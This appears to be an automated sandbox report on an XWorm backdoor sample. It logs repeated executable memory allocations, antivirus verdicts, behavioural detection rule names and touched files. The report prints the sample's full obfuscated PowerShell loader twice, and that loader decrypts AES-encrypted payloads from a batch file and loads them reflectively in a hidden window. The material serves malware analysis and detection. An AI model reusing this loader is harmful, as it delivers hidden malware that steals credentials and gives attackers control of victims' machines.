protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02154000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02155000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02156000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02157000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02158000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02159000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abe000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02abf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2760
thread_handle: 0x00000088
process_identifier: 2756
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0
TrendMicro-HouseCall Backdoor.BAT.XWORM.YXFBJZ
Kaspersky HEUR:Trojan.PowerShell.Agent.gen
TrendMicro Backdoor.BAT.XWORM.YXFBJZ
Kingsoft Win32.Troj.Undef.a
Microsoft Trojan:Script/Wacatac.B!ml
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
option -ep bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe